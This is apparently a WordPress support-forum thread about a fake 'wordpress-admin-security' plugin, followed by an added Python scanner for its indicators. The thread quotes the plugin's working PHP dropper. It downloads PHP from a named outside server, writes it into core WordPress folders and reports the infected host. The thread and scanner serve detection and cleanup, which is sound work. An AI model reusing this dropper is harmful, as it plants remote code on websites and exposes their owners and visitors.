I saw this created by a fake plugin wordpress-admin-security
Moderator
t-p
(@t-p)
Thanks @useshots. That was what was happening with me also. I saw the script was referencing a file hosted on some private school in Louisiana’s server. I emailed them to let them know.
This is the php:
function BNS_Add_Widget_Definition() {
    if (!file_exists(ABSPATH.'wp-about-4.2.php')&&!file_exists(ABSPATH.'wp-content/wp-about-4.2.php')&&!file_exists(ABSPATH.'wp-includes/wp-about-4.2.php')){
        $bns_conf=wp_remote_get('http://archbishopchapelle.org/wp-content/uploads/wpmp-previews/temp.php');
        if (!file_put_contents(ABSPATH.'wp-about-4.2.php',$bns_conf["body"])){
            if (!file_put_contents(ABSPATH.'wp-content/wp-about-4.2.php',$bns_conf["body"])){
                file_put_contents(ABSPATH.'wp-includes/wp-about-4.2.php',$bns_conf["body"]);
                $bns_conf=wp_remote_get('http://archbishopchapelle.org/wp-content/uploads/wpmp-previews/p.php?host='.urlencode($_SERVER['HTTP_HOST'].'-2'));
            } else $bns_conf=wp_remote_get('http://archbishopchapelle.org/wp-content/uploads/wpmp-previews/p.php?host='.urlencode($_SERVER['HTTP_HOST'].'-1'));
        }
    }
}
Yeah. I found this suspicious function hidden in a wordpress-admin-security plugin as well. I suspect it was somehow side-injected through files on GoDaddy’s hosting. I’ve run about 5+ WordPress sites for roughly 12 years and have never had so many security compromises on a WordPress site until I tried GoDaddy’s hosting. But, maybe it was just this particular site. Anyway. +1 to blacklist “wordpress-admin-security”.
Moderator
t-p
(@t-p)
You may want to bring this to the attention of this plugin’s developers so they can take action as appropriate.
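For anyone cleaning up a site affected by the function quoted above, here is a small scanner that looks for the three indicators the thread mentions: the dropped wp-about-4.2.php file in the three locations the function writes to, the wordpress-admin-security plugin folder, and PHP files containing the function name or the wpmp-previews path. This is an added example, not code from any poster in this thread; the default wp-content/plugins location and the file name main.php in the constructed sample are assumptions.

```python
import os
import tempfile

# Indicators taken from the PHP function quoted in the thread.
DROPPED_NAME = "wp-about-4.2.php"
DROP_DIRS = ("", "wp-content", "wp-includes")
CODE_MARKERS = (b"BNS_Add_Widget_Definition", b"wpmp-previews/")
# Assumption: plugins live in the default wp-content/plugins directory.
PLUGIN_DIR = os.path.join("wp-content", "plugins", "wordpress-admin-security")


def scan_wordpress(root):
    """Return sorted (kind, relative_path) findings for a WordPress root."""
    findings = set()
    for sub in DROP_DIRS:
        rel = os.path.join(sub, DROPPED_NAME)
        if os.path.isfile(os.path.join(root, rel)):
            findings.add(("dropped-file", rel))
    if os.path.isdir(os.path.join(root, PLUGIN_DIR)):
        findings.add(("fake-plugin-dir", PLUGIN_DIR))
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if any(marker in data for marker in CODE_MARKERS):
                findings.add(("dropper-code", os.path.relpath(path, root)))
    return sorted(findings)


def build_constructed_sample(root):
    """Create a constructed tree: one infected plugin file, one dropped file."""
    plugin = os.path.join(root, PLUGIN_DIR)
    os.makedirs(plugin)
    os.makedirs(os.path.join(root, "wp-includes"))
    # main.php is a hypothetical file name; the thread does not give one.
    with open(os.path.join(plugin, "main.php"), "w") as fh:
        fh.write("<?php function BNS_Add_Widget_Definition() {} ?>")
    with open(os.path.join(root, "wp-includes", DROPPED_NAME), "w") as fh:
        fh.write("<?php /* constructed placeholder */ ?>")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_sample(tmp)
        print(scan_wordpress(tmp))
```

To check a real install, call scan_wordpress() with the directory that contains wp-config.php. An empty result only means these specific indicators are absent, so renamed copies would need a broader integrity check against a clean WordPress download.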